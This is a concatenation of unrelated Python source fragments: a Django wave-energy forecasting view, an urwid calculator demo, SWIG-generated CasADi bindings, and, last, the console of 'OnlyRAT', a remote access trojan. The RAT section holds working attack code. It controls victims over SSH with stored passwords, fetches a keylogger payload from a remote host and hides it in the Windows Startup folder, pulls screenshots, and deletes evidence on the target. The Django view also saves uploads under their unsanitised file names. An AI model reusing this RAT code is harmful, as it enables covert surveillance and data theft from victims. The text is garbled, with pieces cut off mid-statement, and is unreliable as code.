converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
# args_to_note['dataset_id'] = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
args_to_note['dataset_id'] = request.GET['dataset_id']
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
# dataset_id = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
dataset_id = request.GET['dataset_id']
query_id = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
unit_list_1 = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&y_var[]=power for ' + str(converter.title)
unit_list_1 += 'kW,'
unit_list_1 = unit_list_1[:-1]
power_cols_str += '&y_var_unit=' + unit_list_1
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Generated Power",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df¬ebook_id=" + str(
new_notebook_id) + power_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_generation_forecast_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converter = str(result['name'][0])
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_generation_forecast result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Wave Power Generation Forecast',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technology used:', 'value': str(converter)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_load_matching_execute(request):
service = Service.objects.get(pk=settings.WEC_LOAD_MATCHING_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
load_profile_csv = request.FILES['load_profile_csv']
if not load_profile_csv.name.endswith('.csv'):
return HttpResponse(status=500)
# Write the file to disk
fout = open('wave_energy_pilot/static/wave_energy_pilot/files/load_matching/' + load_profile_csv.name, 'wb')
for chunk in load_profile_csv.chunks():
fout.write(chunk)
fout.close()
# Spawn thread to process the data
t = Thread(target=wec_load_matching_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_load_matching_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
try:
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec, 'post')
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.POST['dataset_id'])).table_name
load_profile_csv = request.FILES['load_profile_csv'].name
args_to_note['load_profile_csv'] = load_profile_csv
converters_selection = request.POST.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.POST['dataset_id']
query_id | |
i:
self.frame.keypress(size, 'down')
nf, (ni, nsub) = self.walker.get_focus()
def move_focus_prev(self, size):
f, (i, sub) = self.walker.get_focus()
assert i>0
ni = i
while ni == i:
self.frame.keypress(size, 'up')
nf, (ni, nsub) = self.walker.get_focus()
def update_results( self, start_from=None ):
"""Update column. Return True if final result changed.
start_from -- Cell to start updating from or None to start from
the current focus (default None)
"""
if start_from is None:
f, (i, sub) = self.walker.get_focus()
else:
i = self.content.index(start_from)
if i == None: return False
focus_cell = self.walker.get_cell(i)
if focus_cell.is_top:
x = focus_cell.get_value()
last_op = None
else:
last_cell = self.walker.get_cell(i-1)
x = last_cell.get_result()
if x is not None and focus_cell.op is not None:
x = OPERATORS[focus_cell.op]( x,
focus_cell.get_value() )
focus_cell.set_result(x)
for cell in self.content[i+1:]:
if cell.op is None:
x = None
if x is not None:
x = OPERATORS[cell.op]( x, cell.get_value() )
if cell.get_result() == x:
return False
cell.set_result(x)
return True
def create_child( self, letter ):
"""Return (parent cell,child column) or None,None on failure."""
f, (i, sub) = self.walker.get_focus()
if sub != 0:
# f is not an edit widget
return None, None
cell = self.walker.get_cell(i)
if cell.child is not None:
raise CalcEvent, E_new_col_cell_not_empty
if cell.edit.edit_text:
raise CalcEvent, E_new_col_cell_not_empty
child = CellColumn( letter )
cell.become_parent( child, letter )
return cell, child
def is_empty( self ):
"""Return True if this column is empty."""
return len(self.content)==1 and self.content[0].is_empty()
def get_expression(self):
"""Return the expression as a printable string."""
l = []
for c in self.content:
if c.op is not None: # only applies to first cell
l.append(c.op)
if c.child is not None:
l.append("("+c.child.get_expression()+")")
else:
l.append("%d"%c.get_value())
return "".join(l)
def get_result(self):
"""Return the result of the last cell in the column."""
return self.content[-1].get_result()
class HelpColumn(urwid.BoxWidget):
help_text = [
('title', "Column Calculator"),
"",
[ "Numbers: ", ('key', "0"), "-", ('key', "9") ],
"" ,
[ "Operators: ",('key', "+"), ", ", ('key', "-"), ", ",
('key', "*"), " and ", ('key', "/")],
"",
[ "Editing: ", ('key', "BACKSPACE"), " and ",('key', "DELETE")],
"",
[ "Movement: ", ('key', "UP"), ", ", ('key', "DOWN"), ", ",
('key', "LEFT"), ", ", ('key', "RIGHT"), ", ",
('key', "PAGE UP"), " and ", ('key', "PAGE DOWN") ],
"",
[ "Sub-expressions: ", ('key', "("), " and ", ('key', ")") ],
"",
[ "Columns: ", ('key', COLUMN_KEYS[0]), " and ",
('key',COLUMN_KEYS[1]), "-",
('key',COLUMN_KEYS[-1]) ],
"",
[ "Exit: ", ('key', "Q") ],
"",
"",
["Column Calculator does operations in the order they are ",
"typed, not by following usual precedence rules. ",
"If you want to calculate ", ('key', "12 - 2 * 3"),
" with the multiplication happening before the ",
"subtraction you must type ",
('key', "12 - (2 * 3)"), " instead."],
]
def __init__(self):
self.head = urwid.AttrWrap(
urwid.Text(["Help Column ", ('key',"?")],
layout = CALC_LAYOUT),
'help')
self.foot = urwid.AttrWrap(
urwid.Text(["[text continues.. press ",
('key',"?"), " then scroll]"]), 'helpnote' )
self.items = [urwid.Text(x) for x in self.help_text]
self.listbox = urwid.ListBox(urwid.SimpleListWalker(self.items))
self.body = urwid.AttrWrap( self.listbox, 'help' )
self.frame = urwid.Frame( self.body, header=self.head)
def render(self, size, focus=False):
maxcol, maxrow = size
head_rows = self.head.rows((maxcol,))
if "bottom" in self.listbox.ends_visible(
(maxcol, maxrow-head_rows) ):
self.frame.footer = None
else:
self.frame.footer = self.foot
return self.frame.render( (maxcol, maxrow), focus)
def keypress( self, size, key ):
return self.frame.keypress( size, key )
class CalcDisplay:
palette = [
('body','white', 'dark blue'),
('edit','yellow', 'dark blue'),
('editfocus','yellow','dark cyan', 'bold'),
('key','dark cyan', 'light gray', ('standout','underline')),
('title', 'white', 'light gray', ('bold','standout')),
('help', 'black', 'light gray', 'standout'),
('helpnote', 'dark green', 'light gray'),
('colhead', 'black', 'light gray', 'standout'),
('event', 'light red', 'black', 'standout'),
('confirm', 'yellow', 'black', 'bold'),
]
def __init__(self):
self.columns = urwid.Columns([HelpColumn(), CellColumn("A")], 1)
self.col_list = self.columns.widget_list
self.columns.set_focus_column( 1 )
view = urwid.AttrWrap(self.columns, 'body')
self.view = urwid.Frame(view) # for showing messages
self.col_link = {}
def main(self):
self.loop = urwid.MainLoop(self.view, self.palette, screen=Screen(),
input_filter=self.input_filter)
self.loop.run()
# on exit write the formula and the result to the console
expression, result = self.get_expression_result()
print "Paste this expression into a new Column Calculator session to continue editing:"
print expression
print "Result:", result
def input_filter(self, input, raw_input):
if 'q' in input or 'Q' in input:
raise urwid.ExitMainLoop()
# handle other keystrokes
for k in input:
try:
self.wrap_keypress(k)
self.event = None
self.view.footer = None
except CalcEvent, e:
# display any message
self.event = e
self.view.footer = e.widget()
# remove all input from further processing by MainLoop
return []
def wrap_keypress(self, key):
"""Handle confirmation and throw event on bad input."""
try:
key = self.keypress(key)
except ColumnDeleteEvent, e:
if e.letter == COLUMN_KEYS[1]:
# cannot delete the first column, ignore key
return
if not self.column_empty( e.letter ):
# need to get two in a row, so check last event
if not isinstance(self.event,ColumnDeleteEvent):
# ask for confirmation
raise e
self.delete_column(e.letter)
except UpdateParentEvent, e:
self.update_parent_columns()
return
if key is None:
return
if self.columns.get_focus_column() == 0:
if key not in ('up','down','page up','page down'):
raise CalcEvent, E_invalid_in_help_col
if key not in EDIT_KEYS and key not in MOVEMENT_KEYS:
raise CalcEvent, E_invalid_key % key.upper()
def keypress(self, key):
"""Handle a keystroke."""
self.loop.process_input([key])
if key.upper() in COLUMN_KEYS:
# column switch
i = COLUMN_KEYS.index(key.upper())
if i >= len( self.col_list ):
raise CalcEvent, E_no_such_column % key.upper()
self.columns.set_focus_column( i )
return
elif key == "(":
# open a new column
if len( self.col_list ) >= len(COLUMN_KEYS):
raise CalcEvent, E_no_more_columns
i = self.columns.get_focus_column()
if i == 0:
# makes no sense in help column
return key
col = self.col_list[i]
new_letter = COLUMN_KEYS[len(self.col_list)]
parent, child = col.create_child( new_letter )
if child is None:
# something invalid in focus
return key
self.col_list.append(child)
self.set_link( parent, col, child )
self.columns.set_focus_column(len(self.col_list)-1)
elif key == ")":
i = self.columns.get_focus_column()
if i == 0:
# makes no sense in help column
return key
col = self.col_list[i]
parent, pcol = self.get_parent( col )
if parent is None:
# column has no parent
raise CalcEvent, E_no_parent_column
new_i = self.col_list.index( pcol )
self.columns.set_focus_column( new_i )
else:
return key
def set_link( self, parent, pcol, child ):
"""Store the link between a parent cell and child column.
parent -- parent Cell object
pcol -- CellColumn where parent resides
child -- child CellColumn object"""
self.col_link[ child ] = parent, pcol
def get_parent( self, child ):
"""Return the parent and parent column for a given column."""
return self.col_link.get( child, (None,None) )
def column_empty(self, letter):
"""Return True if the column passed is empty."""
i = COLUMN_KEYS.index(letter)
col = self.col_list[i]
return col.is_empty()
def delete_column(self, letter):
"""Delete the column with the given letter."""
i = COLUMN_KEYS.index(letter)
col = self.col_list[i]
parent, pcol = self.get_parent( col )
f = self.columns.get_focus_column()
if f == i:
# move focus to the parent column
f = self.col_list.index(pcol)
self.columns.set_focus_column(f)
parent.remove_child()
pcol.update_results(parent)
del self.col_list[i]
# delete children of this column
keep_right_cols = []
remove_cols = [col]
for rcol in self.col_list[i:]:
parent, pcol = self.get_parent( rcol )
if pcol in remove_cols:
remove_cols.append( rcol )
else:
keep_right_cols.append( rcol )
for rc in remove_cols:
# remove the links
del self.col_link[rc]
# keep only the non-children
self.col_list[i:] = keep_right_cols
# fix the letter assignments
for j in range(i, len(self.col_list)):
col = self.col_list[j]
# fix the column heading
col.set_letter( COLUMN_KEYS[j] )
parent, pcol = self.get_parent( col )
# fix the parent cell
parent.edit.set_letter( COLUMN_KEYS[j] )
def update_parent_columns(self):
"Update the parent columns of the current focus column."
f = self.columns.get_focus_column()
col = self.col_list[f]
while 1:
parent, pcol = self.get_parent(col)
if pcol is None:
return
changed = pcol.update_results( start_from = parent )
if not changed:
return
col = pcol
def get_expression_result(self):
"""Return (expression, result) as strings."""
col = self.col_list[1]
return col.get_expression(), "%d"%col.get_result()
class CalcNumLayout(urwid.TextLayout):
"""
TextLayout class for bottom-right aligned numbers with a space on
the last line for the cursor.
"""
def layout( self, text, width, align, wrap ):
"""
Return layout structure for calculator number display.
"""
lt = len(text) + 1 # extra space for cursor
r = (lt) % width # remaining segment not full width wide
linestarts = range( r, lt, width )
l = []
if linestarts:
if r:
# right-align the | |
ncol, int p) -> [SX]
Create a vector of length p with nrow-by-ncol symbolic primitives.
sym(str name, Sparsity sp, int p, int r) -> [[SX]]
Create a vector of length r of vectors of length p with symbolic primitives
sym(str name, int nrow, int ncol, int p, int r) -> [[SX]]
symbolic primitives.
> sym(str name, (int,int) rc)
------------------------------------------------------------------------
Construct a symbolic primitive with given dimensions.
> sym(str name, int nrow, int ncol, int p)
------------------------------------------------------------------------
Create a vector of length p with nrow-by-ncol symbolic primitives.
> sym(str name, Sparsity sp, int p, int r)
------------------------------------------------------------------------
Create a vector of length r of vectors of length p with symbolic primitives
with given sparsity.
> sym(str name, int nrow, int ncol, int p, int r)
------------------------------------------------------------------------
Create a vector of length r of vectors of length p with nrow-by-ncol
symbolic primitives.
> sym(str name, Sparsity sp)
------------------------------------------------------------------------
Create symbolic primitive with a given sparsity pattern.
> sym(str name, int nrow, int ncol)
------------------------------------------------------------------------
Create an nrow-by-ncol symbolic primitive.
> sym(str name, Sparsity sp, int p)
------------------------------------------------------------------------
Create a vector of length p with with matrices with symbolic primitives of
given sparsity.
"""
return _casadi.GenSX_sym(*args)
sym = staticmethod(sym)
def zeros(*args):
"""
Create a dense matrix or a matrix with specified sparsity with all entries
zeros(int nrow, int ncol) -> SX
zeros((int,int) rc) -> SX
zeros(Sparsity sp) -> SX
zero.
"""
return _casadi.GenSX_zeros(*args)
zeros = staticmethod(zeros)
def ones(*args):
"""
Create a dense matrix or a matrix with specified sparsity with all entries
ones(int nrow, int ncol) -> SX
ones((int,int) rc) -> SX
ones(Sparsity sp) -> SX
one.
"""
return _casadi.GenSX_ones(*args)
ones = staticmethod(ones)
def __init__(self, *args):
"""
GenSX()
GenSX(GenSX other)
"""
this = _casadi.new_GenSX(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _casadi.delete_GenSX
GenSX_swigregister = _casadi.GenSX_swigregister
GenSX_swigregister(GenSX)
def GenSX_sym(*args):
"""
Create a vector of length r of vectors of length p with nrow-by-ncol
sym(str name, int nrow, int ncol) -> SX
Create an nrow-by-ncol symbolic primitive.
sym(str name, (int,int) rc) -> SX
Construct a symbolic primitive with given dimensions.
sym(str name, Sparsity sp) -> SX
Create symbolic primitive with a given sparsity pattern.
sym(str name, Sparsity sp, int p) -> [SX]
Create a vector of length p with with matrices with symbolic primitives of
sym(str name, int nrow, int ncol, int p) -> [SX]
Create a vector of length p with nrow-by-ncol symbolic primitives.
sym(str name, Sparsity sp, int p, int r) -> [[SX]]
Create a vector of length r of vectors of length p with symbolic primitives
sym(str name, int nrow, int ncol, int p, int r) -> [[SX]]
symbolic primitives.
> sym(str name, (int,int) rc)
------------------------------------------------------------------------
Construct a symbolic primitive with given dimensions.
> sym(str name, int nrow, int ncol, int p)
------------------------------------------------------------------------
Create a vector of length p with nrow-by-ncol symbolic primitives.
> sym(str name, Sparsity sp, int p, int r)
------------------------------------------------------------------------
Create a vector of length r of vectors of length p with symbolic primitives
with given sparsity.
> sym(str name, int nrow, int ncol, int p, int r)
------------------------------------------------------------------------
Create a vector of length r of vectors of length p with nrow-by-ncol
symbolic primitives.
> sym(str name, Sparsity sp)
------------------------------------------------------------------------
Create symbolic primitive with a given sparsity pattern.
> sym(str name, int nrow, int ncol)
------------------------------------------------------------------------
Create an nrow-by-ncol symbolic primitive.
> sym(str name, Sparsity sp, int p)
------------------------------------------------------------------------
Create a vector of length p with with matrices with symbolic primitives of
given sparsity.
"""
return _casadi.GenSX_sym(*args)
def GenSX_zeros(*args):
"""
Create a dense matrix or a matrix with specified sparsity with all entries
zeros(int nrow, int ncol) -> SX
zeros((int,int) rc) -> SX
zeros(Sparsity sp) -> SX
zero.
"""
return _casadi.GenSX_zeros(*args)
def GenSX_ones(*args):
"""
Create a dense matrix or a matrix with specified sparsity with all entries
ones(int nrow, int ncol) -> SX
ones((int,int) rc) -> SX
ones(Sparsity sp) -> SX
one.
"""
return _casadi.GenSX_ones(*args)
class GenMX(GenericMatrixCommon, SparsityInterfaceCommon):
"""
"""
__swig_setmethods__ = {}
for _s in [GenericMatrixCommon, SparsityInterfaceCommon]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GenMX, name, value)
__swig_getmethods__ = {}
for _s in [GenericMatrixCommon, SparsityInterfaceCommon]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GenMX, name)
__repr__ = _swig_repr
def nnz(self, *args):
"""
Get the number of (structural) non-zero elements.
nnz(self) -> int
"""
return _casadi.GenMX_nnz(self, *args)
def nnz_lower(self, *args):
"""
Get the number of non-zeros in the lower triangular half.
nnz_lower(self) -> int
"""
return _casadi.GenMX_nnz_lower(self, *args)
def nnz_upper(self, *args):
"""
Get the number of non-zeros in the upper triangular half.
nnz_upper(self) -> int
"""
return _casadi.GenMX_nnz_upper(self, *args)
def nnz_diag(self, *args):
"""
Get get the number of non-zeros on the diagonal.
nnz_diag(self) -> int
"""
return _casadi.GenMX_nnz_diag(self, *args)
def numel(self, *args):
"""
Get the number of elements.
numel(self) -> int
"""
return _casadi.GenMX_numel(self, *args)
def size1(self, *args):
"""
Get the first dimension (i.e. number of rows)
size1(self) -> int
"""
return _casadi.GenMX_size1(self, *args)
def rows(self, *args):
"""
Get the number of rows, Octave-style syntax.
rows(self) -> int
"""
return _casadi.GenMX_rows(self, *args)
def size2(self, *args):
"""
Get the second dimension (i.e. number of columns)
size2(self) -> int
"""
return _casadi.GenMX_size2(self, *args)
def columns(self, *args):
"""
Get the number of columns, Octave-style syntax.
columns(self) -> int
"""
return _casadi.GenMX_columns(self, *args)
def dim(self, *args):
"""
Get string representation of dimensions. The representation is e.g. "4x5"
dim(self, bool with_nz) -> str
or "4x5,10nz".
"""
return _casadi.GenMX_dim(self, *args)
def size(self, *args):
"""
Get the size along a particular dimensions.
size(self) -> (int,int)
Get the shape.
size(self, int axis) -> int
> size(self)
------------------------------------------------------------------------
Get the shape.
> size(self, int axis)
------------------------------------------------------------------------
Get the size along a particular dimensions.
"""
return _casadi.GenMX_size(self, *args)
def is_empty(self, *args):
"""
Check if the sparsity is empty, i.e. if one of the dimensions is zero (or
is_empty(self, bool both) -> bool
optionally both dimensions)
"""
return _casadi.GenMX_is_empty(self, *args)
def is_dense(self, *args):
"""
Check if the matrix expression is dense.
is_dense(self) -> bool
"""
return _casadi.GenMX_is_dense(self, *args)
def is_scalar(self, *args):
"""
Check if the matrix expression is scalar.
is_scalar(self, bool scalar_and_dense) -> bool
"""
return _casadi.GenMX_is_scalar(self, *args)
def is_square(self, *args):
"""
Check if the matrix expression is square.
is_square(self) -> bool
"""
return _casadi.GenMX_is_square(self, *args)
def is_vector(self, *args):
"""
Check if the matrix is a row or column vector.
is_vector(self) -> bool
"""
return _casadi.GenMX_is_vector(self, *args)
def is_row(self, *args):
"""
Check if the matrix is a row vector (i.e. size1()==1)
is_row(self) -> bool
"""
return _casadi.GenMX_is_row(self, *args)
def is_column(self, *args):
"""
Check if the matrix is a column vector (i.e. size2()==1)
is_column(self) -> bool
"""
return _casadi.GenMX_is_column(self, *args)
def is_triu(self, *args):
"""
Check if the matrix is upper triangular.
is_triu(self) -> bool
"""
return _casadi.GenMX_is_triu(self, *args)
def is_tril(self, *args):
"""
Check if the matrix is lower triangular.
is_tril(self) -> bool
"""
return _casadi.GenMX_is_tril(self, *args)
def row(self, *args):
"""
Get the sparsity pattern. See the Sparsity class for details.
row(self) -> [int]
row(self, int el) -> int
"""
return _casadi.GenMX_row(self, *args)
def colind(self, *args):
"""
Get the sparsity pattern. See the Sparsity class for details.
colind(self) -> [int]
colind(self, int col) -> int
"""
return _casadi.GenMX_colind(self, *args)
def sparsity(self, *args):
"""
Get the sparsity pattern.
sparsity(self) -> Sparsity
"""
return _casadi.GenMX_sparsity(self, *args)
def sym(*args):
"""
Create a vector of length r of vectors of length p with nrow-by-ncol
sym(str name, int nrow, int ncol) -> MX
Create an nrow-by-ncol symbolic primitive.
sym(str name, (int,int) rc) -> MX
Construct a symbolic primitive with given dimensions.
sym(str name, Sparsity sp) -> MX
Create symbolic primitive with a given sparsity pattern.
sym(str name, Sparsity sp, int p) -> [MX]
Create a vector of length p with with matrices with symbolic primitives of
sym(str name, int nrow, int ncol, int p) -> [MX]
Create a vector of length p with nrow-by-ncol symbolic primitives.
sym(str name, Sparsity sp, int p, int r) -> [[MX]]
Create | |
#!/usr/bin/python
# python console for OnlyRAT
# created by : C0SM0
# imports
import os
import sys
import getpass
import random as r
from datetime import datetime
# banner for display
banner = """
_;,
,,=-,--,,__ _,-;:;;},,,_
_,oo, Ll _,##&&&&$$&&$$$&-=;%%^%&;v:&& @ `=,_
,oO" `0} Ll ,%#####&#>&&$$$$&$$$&,&'$$#`"%%;,,,*%^<}
_,--O;_, 0_ Ll ,%%%%%&%-#&###$$"$$$$$*;&&$,#;%^*%$$^{,%;'
,cC'oO`'CC ,OnnNNNNn, Ll YY, ,%#&%%$$$$%%%%%##&&^$%^%&&&$$'&#,-%%--"'
,CCCO" `C ,0`Nn` `Nn Ll YY, ,;;##&,$$$$$$$;,%%%&&%%%&&&&&&$$%%'
{CC{ ,0' NN NN Ll Yy yY';#&,#,$$$$$%%%%%%%%&%%%&&&&&&%%`
CCC( _o0 NN NN Ll YyyY ,;&##&###%%$$%&&%%%%#^%^&&&&&%{`
,OCC{ ,0C NN NN Ll YY ;#&&#####&%;%&&,%%%%#%=%%%&^%%
,O`'"Cc_.o0cC NN NN Ll y, YY ;&&&^##&&&$%&&&%%%"` `%%%%
o0 _o0"` '` NN NN Ll Yy,yYY '^%%&VGh%%%%%&&"^%_,, "%%%,_ _,.,_
0o,_,oo0" NN NN Ll `YyY` ``'"lIG9ubHkg,,""''` ""%%>_,;VyIG5lZ;,
"00O"` ``'``""UkFUIHlvdSdsbCBldm;" `"WQ=,
"""
# _..----.._ _
# .' .--. "-.(0)_
# '-.__.-'"'=:| , _)_ \\__ . c\\'-..
# '''------'---''---'-"
# :::::::: :::: ::: ::: ::: ::: ::::::::: ::: :::::::::::
# :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
# +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
# +#+ +:+ +#+ +:+ +#+ +#+ +#++: +#++:++#: +#++:++#++: +#+
# +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ +#+
# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
# ######## ### #### ########## ### ### ### ### ### ###
# [::] The Only RAT You'll Ever Need [::]
# [::] Created By : Blue Cosmo [::]
# help menu
help_menu = """
[+] Arguments:
<username>.rat = configuration file
[+] Example:
onlyrat bluecosmo.rat
"""
# option menu
options_menu = """
[+] Command and Control:
[orconsole] ------ Remote Console
[fix orconsole] -- Fix Remote Console
[upload] --------- Upload File
[downlaod] ------- Download File
[restart] -------- Restart Target PC
[shutdown] ------- Shutdown Target PC
[killswitch] ----- Removes OnlyRAT From Target
[+] Reconnaissance:
[install keylogger] ------ Install Keylogger
[install screencapture] -- Install ScreenCapture
[install webcam] --------- Install WebCam Capture
[grab keylogs] ----------- Grab Keylogs
[grab screenshots] ------- Grab ScreenShots From ScreenCapture
[grab webcam] ------------ Grab WebCam Photos
[+] Options:
[help] ------- Help Menu
[man] -------- Onlyrat Manual
[config] ----- Display RAT File
[version] ---- Version Number
[update] ----- Update OnlyRAT
[uninstall] -- Uninstall OnlyRAT
[quit] ------- Quit
* any other commands will be
sent through your terminal
[*] Select an [option]...
"""
username = getpass.getuser() # gets username
header = f"[~] {username}@onlyrat $ " # sets up user input interface
remote_path = "raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main" # url path for OnlyRAT files
local_path = f"/home/{username}/.OnlyRAT" if username != "root" else "/root/.OnlyRAT" # gets path of OnlyRAT
# random text generator for obfuscation
def random_text():
lower_case = "abcdefghijklmnopqrstuvwxyz"
upper_case = "abcdefghijklmnopqrstuvwxyz".upper()
characters = lower_case + upper_case
generated_text = ""
for i in range(10):
generated_text += r.choice(list(characters))
return generated_text
# read config file
def read_config(config_file):
configuration = {}
# get file contents
read_lines = open(config_file, "r").readlines()
# get target configurations
configuration["IPADDRESS"] = read_lines[0].strip()
configuration["PASSWORD"] = read_lines[1].strip()
configuration["WORKINGDIRECTORY"] = (read_lines[2]).replace("\\", "/").strip()
configuration["STARTUPDIRECTORY"] = (read_lines[3]).replace("\\", "/").strip()
return configuration
# display configuration file data
def print_config(configuration):
for key, value in configuration.items():
print(f"{key} : {value}")
# clear screen
def clear():
os.system("clear")
# terminates program
def exit():
print("\n[*] Exiting...")
sys.exit()
# gets current date and time
def current_date():
current = datetime.now()
return current.strftime("%m-%d-%Y_%H-%M-%S")
# connects rat to target
def connect(address, password):
print("\n [*] Connecting to target...")
# remotely connect
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address}")
# remote uploads with SCP
def remote_upload(address, password, upload, path):
print("\n[*] Starting Upload...")
# scp upload
os.system(f"sshpass -p \"{password}\" scp {upload} onlyrat@{address}:{path}")
print("[+] Upload complete\n")
# remote download with SCP
def remote_download(address, password, path):
print("\n[*] Starting Download...")
# scp download
os.system("mkdir ~/Downloads")
os.system(f"sshpass -p \"{password}\" scp -r onlyrat@{address}:{path} ~/Downloads")
print("[+] Download saved to \"~/Downloads\"\n")
# run commands remotely with SCP
def remote_command(address, password, command):
# remote command execution
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address} '{command}'")
# keylogger
def keylogger(address, password, username, working):
print("\n[*] Prepping keylogger...")
# web requests
keylogger_command = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/keylogger.ps1 -OutFile {working}/KHRgMHYmdT.ps1\""
controller_command = f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/KHRgMHYmdT.ps1 >> GiLqXiexKP.cmd"
print("[+] Keylogger prepped")
# installing keylogger
print("[*] Installing keylogger...")
remote_command(address, password, keylogger_command)
print("[*] Installing controller...")
remote_command(address, password, controller_command)
print("[+] Keylogger installed sucessfully\n")
# execute logger
print("\n[!] Restart target computer to execute")
# takes screenshots off of target
def grab_screenshots(address, password, working, username):
# download screenshot
print("\n[*] Downloading screenshots...")
screenshot_location = f"{working}/amETlOMhPo"
remote_download(address, password, screenshot_location)
print("[+] Screenshots downloaded")
# formatting screenshots
print("[*] Fromatting screenshots...")
loot_folder = f"screenshots-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/amETlOMhPo")
print("[+] Screenshots formatted")
# deletes screenshots off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/amETlOMhPo/*"
remote_command(address, password, delete_screenshots)
